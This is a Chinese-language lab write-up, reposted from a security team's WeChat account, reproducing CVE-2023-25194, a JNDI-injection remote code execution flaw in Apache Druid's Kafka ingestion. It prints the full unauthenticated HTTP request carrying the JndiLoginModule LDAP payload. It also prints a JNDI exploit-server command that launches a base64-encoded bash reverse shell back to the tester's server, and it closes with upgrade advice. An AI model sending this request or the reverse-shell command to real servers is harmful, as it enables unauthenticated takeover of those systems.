『漏洞复现』Apache Druid RCE

admin 2024年10月30日19:18:07评论26 views字数 2101阅读7分0秒阅读模式

点击蓝字 关注我们

『漏洞复现』Apache Druid RCE
日期:2024年10月29日
作者:pbfochk
介绍:CVE-2023-25194 Apache Druid RCE 漏洞。

0x01 漏洞简介

Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。

Apache Druid 使用 Apache Kafka 加载数据的场景下,未经身份认证的远程攻击者可配置 Kafka 连接属性,从而利用 CVE-2023-25194 漏洞触发 JNDI 注入,最终执行任意代码。(其他使用 Apache Kafka Connect 的产品也可能受 CVE-2023-25194 漏洞影响)

影响范围:

0.19.0 <= Apache Druid <= 25.0.02.3.0 <= Apache Kafka版本 <= 3.3.2

0x02 环境部署

环境用 githubvulhubdocker 搭建:

环境地址:

https://github.com/vulhub/vulhub/blob/master/kafka/CVE-2023-25194
『漏洞复现』Apache Druid RCE

漏洞访问:

http://vps:8888
『漏洞复现』Apache Druid RCE

0x03 漏洞复现

3.1 检测环境

『漏洞复现』Apache Druid RCE

『漏洞复现』Apache Druid RCE

填写数据进行抓包:

『漏洞复现』Apache Druid RCE

『漏洞复现』Apache Druid RCE

测试 dnslog

POST /druid/indexer/v1/sampler?for=connect HTTP/1.1Host: ip:8888User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 1400Origin: http://124.221.116.113:8888Connection: closeReferer: http://124.221.116.113:8888/unified-console.htmlPriority: u=0{    "type":"kafka",    "spec":{        "type":"kafka",        "ioConfig":{            "type":"kafka",            "consumerProperties":{                "bootstrap.servers":"127.0.0.1:6666",                "sasl.mechanism":"SCRAM-SHA-256",                "security.protocol":"SASL_SSL",                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://bcgufe.dnslog.cn" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"            },            "topic":"test",            "useEarliestOffset":true,            "inputFormat":{                "type":"regex",                "pattern":"([\s\S]*)",                "listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965",                "columns":[                    "raw"                ]            }        },        "dataSchema":{            "dataSource":"sample",            "timestampSpec":{                "column":"!!!_no_such_column_!!!",                "missingValue":"1970-01-01T00:00:00Z"            },            "dimensionsSpec":{            },            "granularitySpec":{                "rollup":false            }        },        "tuningConfig":{            "type":"kafka"        }    },    "samplerConfig":{        "numRows":500,        "timeoutMs":15000    }}
『漏洞复现』Apache Druid RCE
『漏洞复现』Apache Druid RCE

3.2 漏洞利用

尝试反弹 shell ,获取权限:

vps 开启监听:

『漏洞复现』Apache Druid RCE

bash 编码:

『漏洞复现』Apache Druid RCE

启动恶意的 JNDI 服务器:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaC0000000000000000A+JjE=}|{base64,-d}|{bash,-i}" -A ip
『漏洞复现』Apache Druid RCE

更换 ldap 的内容,burp 发包:

『漏洞复现』Apache Druid RCE

反弹 shell 成功:

『漏洞复现』Apache Druid RCE

0x04 修复建议

升级至:Apache Kafka 3.4.0 及以上版本。

『漏洞复现』Apache Druid RCE

免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。

点此亲启

原文始发于微信公众号(宸极实验室):『漏洞复现』Apache Druid RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月30日19:18:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   『漏洞复现』Apache Druid RCEhttps://cn-sec.com/archives/3334709.html

发表评论

匿名网友 填写信息